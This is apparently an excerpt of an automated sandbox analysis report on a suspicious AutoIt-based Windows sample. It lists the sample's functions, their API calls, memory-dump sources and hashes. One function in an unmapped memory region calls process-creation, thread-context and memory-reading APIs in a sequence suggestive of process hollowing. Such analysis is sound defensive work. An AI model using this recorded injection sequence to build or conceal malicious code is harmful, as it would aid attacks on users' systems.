                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00E597D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00E59B5B
                                          • CloseHandle.KERNEL32(00000000,?,00E597D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E59B62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: d63b30c5d122e9f098b896b11f666cf17e58c2bed86155d5cd2d59e6418fce0c
                                          • Instruction ID: e6d9fb50e6197f7bf8a5b8aa504e3d2cd3866dafff62863887f472ddd4eda32f
                                          • Opcode Fuzzy Hash: d63b30c5d122e9f098b896b11f666cf17e58c2bed86155d5cd2d59e6418fce0c
                                          • Instruction Fuzzy Hash: 12E08632581214FBE7215B65EC09FCA7B58AB05765F104220FB58790E187B125559798
                                          Function 00E58F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00E58FA5
                                            • Part of subcall function 00E12F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00E19C64), ref: 00E12FA9
                                            • Part of subcall function 00E12F95: GetLastError.KERNEL32(00000000,?,00E19C64), ref: 00E12FBB
                                          • _free.LIBCMT ref: 00E58FB6
                                          • _free.LIBCMT ref: 00E58FC8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 6740c19424ad1a37d1e510644c69b04a79e8c94fc3ec92f8705ee7c8fdd8006d
                                          • Instruction ID: 509d229c25660b8e58e4cb1948c0c55e8934f978b00feacf3ce560fb28fce120
                                          • Opcode Fuzzy Hash: 6740c19424ad1a37d1e510644c69b04a79e8c94fc3ec92f8705ee7c8fdd8006d
                                          • Instruction Fuzzy Hash: 2AE0C2B130C7004ACE20A538BE04AC317EF0F4C316B082C0DBA0AFB142CE20E8928034
                                          Function 00DFAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          • API String ID: 0-4196123274
                                          • Opcode ID: 9f2ca5d56ae2277957ceeb2579e0a41e86956d5e93db9d9b3b4686c3a13f5971
                                          • Instruction ID: b66b380e389d28f0dbb328a7d9c629042cb26995cc38866a0b679443fc19362f
                                          • Opcode Fuzzy Hash: 9f2ca5d56ae2277957ceeb2579e0a41e86956d5e93db9d9b3b4686c3a13f5971
                                          • Instruction Fuzzy Hash: 0C226A70508345CFC724DF18C494B6ABBE1BF84304F1AC95DE99A9B262D731EC85CB92
                                          Function 00DF492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsThemeActive.UXTHEME ref: 00DF4992
                                            • Part of subcall function 00E135AC: __lock.LIBCMT ref: 00E135B2
                                            • Part of subcall function 00E135AC: DecodePointer.KERNEL32(00000001,?,00DF49A7,00E481BC), ref: 00E135BE
                                            • Part of subcall function 00E135AC: EncodePointer.KERNEL32(?,?,00DF49A7,00E481BC), ref: 00E135C9
                                            • Part of subcall function 00DF4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00DF4A73
                                            • Part of subcall function 00DF4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DF4A88
                                            • Part of subcall function 00DF3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DF3B7A
                                            • Part of subcall function 00DF3B4C: IsDebuggerPresent.KERNEL32 ref: 00DF3B8C
                                            • Part of subcall function 00DF3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00EB62F8,00EB62E0,?,?), ref: 00DF3BFD
                                            • Part of subcall function 00DF3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00DF3C81
                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00DF49D2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                          • String ID:
                                          • API String ID: 1438897964-0
                                          • Opcode ID: 9bbbd4664a03a11bfe0f02dffd85d514485e348e809f6309c4a083bd9b396762
                                          • Instruction ID: 4c1039da880407effb525c61738722b9e94414c8d572ae8d587ae985b51d24a8
                                          • Opcode Fuzzy Hash: 9bbbd4664a03a11bfe0f02dffd85d514485e348e809f6309c4a083bd9b396762
                                          • Instruction Fuzzy Hash: D011C0719183059FC700DF2ADC0592BFBE8EF84710F00861EF594A72B1DB708958CBA1
                                          Function 00E10FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E1594C: __FF_MSGBANNER.LIBCMT ref: 00E15963
                                            • Part of subcall function 00E1594C: __NMSG_WRITE.LIBCMT ref: 00E1596A
                                            • Part of subcall function 00E1594C: RtlAllocateHeap.NTDLL(01780000,00000000,00000001,00000000,?,?,?,00E11013,?), ref: 00E1598F
                                          • std::exception::exception.LIBCMT ref: 00E1102C
                                          • __CxxThrowException@8.LIBCMT ref: 00E11041
                                            • Part of subcall function 00E187DB: RaiseException.KERNEL32(?,?,?,00EABAF8,00000000,?,?,?,?,00E11046,?,00EABAF8,?,00000001), ref: 00E18830
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                          • String ID:
                                          • API String ID: 3902256705-0
                                          • Opcode ID: de73dfc1905ce451a1b144f40e0da548de5e03926f6f23e1f7308c521dc181f2
                                          • Instruction ID: b106f030bd7d464a0630931428ed808a418722cc92478c3f98180425d903fa1e
                                          • Opcode Fuzzy Hash: de73dfc1905ce451a1b144f40e0da548de5e03926f6f23e1f7308c521dc181f2
                                          • Instruction Fuzzy Hash: D1F0283590034DA6CB20BA68ED029EF7BEC9F04350F10206AFA08B61C1DFB18AC0D2D0
                                          Function 00E1582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __lock_file_memset
                                          • String ID:
                                          • API String ID: 26237723-0
                                          • Opcode ID: b11b94a8843a3dd9608d0f3aed2b54e237624318d40f54051231b766022cc90c
                                          • Instruction ID: 842916ac6b97ee5bfa73c1890bc4f92a45f6447ca8cbd7f4006daa1269250178
                                          • Opcode Fuzzy Hash: b11b94a8843a3dd9608d0f3aed2b54e237624318d40f54051231b766022cc90c
                                          • Instruction Fuzzy Hash: E8018872800608EBCF11AF698D029DE7BA1AF85360F145225B8247A161DB318A91DB91
                                          Function 00E155D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E18D68: __getptd_noexit.LIBCMT ref: 00E18D68
                                          • __lock_file.LIBCMT ref: 00E1561B
                                            • Part of subcall function 00E16E4E: __lock.LIBCMT ref: 00E16E71
                                          • __fclose_nolock.LIBCMT ref: 00E15626
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                          • String ID:
                                          • API String ID: 2800547568-0
                                          • Opcode ID: 03bf23a8e9ba9c4b97a59d37a3a627d5cc56137399897e47a3370a5b491fb7f9
                                          • Instruction ID: c4eef39930d0e9dfcf184cae60b1b532fceadcbd7baf9d82afd64225156f3a0f
                                          • Opcode Fuzzy Hash: 03bf23a8e9ba9c4b97a59d37a3a627d5cc56137399897e47a3370a5b491fb7f9
                                          • Instruction Fuzzy Hash: 59F0B473904B04DAD720AF758902BEE77E16F81334F65A209A425BB1C1CFBC8EC19B95
                                          Function 00FF129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00FF1A5B
                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FF1AF1
                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FF1B13
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_ff0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                          • String ID:
                                          • API String ID: 2438371351-0
                                          • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                          • Instruction ID: 81838b00316419788e5a6d6db678a80fcab6092df92bce150c3a3d8ff3d812f6
                                          • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
                                          • Instruction Fuzzy Hash: FF12BE24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A5F81CB5A
                                          Function 00DFF3F0 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 198996caa749317a40f2aaf138a6a25b3074b9ab961d9cac8b3a682a9b5c0457
                                          • Instruction ID: b024d84035a7e25e238387c1b0ec2b928723cd499e6804ea48820ede71efc696
                                          • Opcode Fuzzy Hash: 198996caa749317a40f2aaf138a6a25b3074b9ab961d9cac8b3a682a9b5c0457
                                          • Instruction Fuzzy Hash: C561A0B0A0020A9FCB10DF64C891ABBB7F5EF48304F19C479EA4697281D770ED51CB61
                                          Function 00E6D95D Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: e675f1f84c84f6c4a193459ae399155395b26a755fcb90e5474fa7fb1c4cb3d4
                                          • Instruction ID: ce3054e8b10308f946a72eca3558061f2229176b03d2f3c43b8996dd74113bb4
                                          • Opcode Fuzzy Hash: e675f1f84c84f6c4a193459ae399155395b26a755fcb90e5474fa7fb1c4cb3d4
                                          • Instruction Fuzzy Hash: 8531C435A4C524CFCF10AF44E8907A9BBB1FF88360F51D089E996AB346C771A945CBA1
                                          Function 00E300D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: 597e2a752ea8137e960bb4c04dfc9f8fa83a9f2d6eb4d28bd5ff3a0d9891bda9
                                          • Instruction ID: 51f96e0031db8384ff1fea3ae721a336ecfac966437eb63a86c39244465cde68
                                          • Opcode Fuzzy Hash: 597e2a752ea8137e960bb4c04dfc9f8fa83a9f2d6eb4d28bd5ff3a0d9891bda9
                                          • Instruction Fuzzy Hash: 7F410BB4504355CFDB14DF18C494B2ABBE0BF45318F1A889CE9999B362D335EC85CB52
                                          Function 00DF4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00DF4D4D
                                            • Part of subcall function 00E1548B: __wfsopen.LIBCMT ref: 00E15496
                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00EB62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DF4F6F
                                            • Part of subcall function 00DF4CC8: FreeLibrary.KERNEL32(00000000), ref: 00DF4D02
                                            • Part of subcall function 00DF4DD0: _memmove.LIBCMT ref: 00DF4E1A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Library$Free$Load__wfsopen_memmove
                                          • String ID:
                                          • API String ID: 1396898556-0
                                          • Opcode ID: e475883cd41d990f42a018c351ad41877705e6af60e22e4cf0dc3296cd2a8af5
                                          • Instruction ID: bb90b683eaab5bc58151f2f652e84c3d8c7f278b6fb17b853fb475155d5d0578
                                          • Opcode Fuzzy Hash: e475883cd41d990f42a018c351ad41877705e6af60e22e4cf0dc3296cd2a8af5
                                          • Instruction Fuzzy Hash: 5011C43160060DAACB10AF70DC02BBE77A4DF80711F12C429FB45AA1C2DA759A059770
                                          Function 00E301AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: b9165f7defcb3e4ed60c2484ce900cc8ab1e78941965e884db1fdd2c3fe745bb
                                          • Instruction ID: 45c80488996f329669f983e0bc051bd6ab9f5e9f375236d4c2318d2fecb01109
                                          • Opcode Fuzzy Hash: b9165f7defcb3e4ed60c2484ce900cc8ab1e78941965e884db1fdd2c3fe745bb
                                          • Instruction Fuzzy Hash: 0C2127B4A08345CFCB14DF14C444B6ABBE0BF88314F0A896CFA9957761D731E849CB62
                                          Function 00E4DC20 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E47652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?,?,00E4799D), ref: 00E4766F
                                            • Part of subcall function 00E47652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E4768A
                                            • Part of subcall function 00E47652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E47698
                                            • Part of subcall function 00E47652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?), ref: 00E476A8
                                          • IIDFromString.OLE32(00000000,?,?,?,00E4DAA9,?,?,?,?,?,?,?,?,?), ref: 00E4DC57
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: 275098861bd76ce9865130c962833d83b90306b65e15e858016002f3d00542c7
                                          • Instruction ID: 8cf2f79b5f4b03fc1c5e73e455d05b6d06631dcceffbc2b6bc6839e7b1de2c42
                                          • Opcode Fuzzy Hash: 275098861bd76ce9865130c962833d83b90306b65e15e858016002f3d00542c7
                                          • Instruction Fuzzy Hash: F2F01D75248606DBDB04DF05ECC0AA6BB99FB45364B10A165ED08EE155C3F1E944DBA0
                                          Function 00E14A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                          Download Yara Rule
                                          APIs
                                          • __lock_file.LIBCMT ref: 00E14AD6
                                            • Part of subcall function 00E18D68: __getptd_noexit.LIBCMT ref: 00E18D68
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __getptd_noexit__lock_file
                                          • String ID:
                                          • API String ID: 2597487223-0
                                          • Opcode ID: 31ee6291cec7207983bf84a20f9456515edb7eafa0a3f9045c52992c60228c59
                                          • Instruction ID: a9f498edb154b0e2f576206ea4dde35fbb2d5fed5fa3496047f23d85be621383
                                          • Opcode Fuzzy Hash: 31ee6291cec7207983bf84a20f9456515edb7eafa0a3f9045c52992c60228c59
                                          • Instruction Fuzzy Hash: FFF0FFB1900209ABDF61AF748C02BDE36E0AF00329F05A104B424BA2D1DB788AD1CF90
                                          Function 00DF4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • FreeLibrary.KERNEL32(?,?,00EB62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DF4FDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: e79da77b1098235df27e7be5d48bb22067a5c96c65eda99d04268afc004d4efc
                                          • Instruction ID: 1ede81944563e27a52d1c195b93bffa6317663934f3a03ac763ad3ef3796a517
                                          • Opcode Fuzzy Hash: e79da77b1098235df27e7be5d48bb22067a5c96c65eda99d04268afc004d4efc
                                          • Instruction Fuzzy Hash: 77F01571105716CFCB349F64E494823BBF1BF04329326CA3EE2DA82A10C731A884DB60
                                          Function 00E109D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E109F4
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
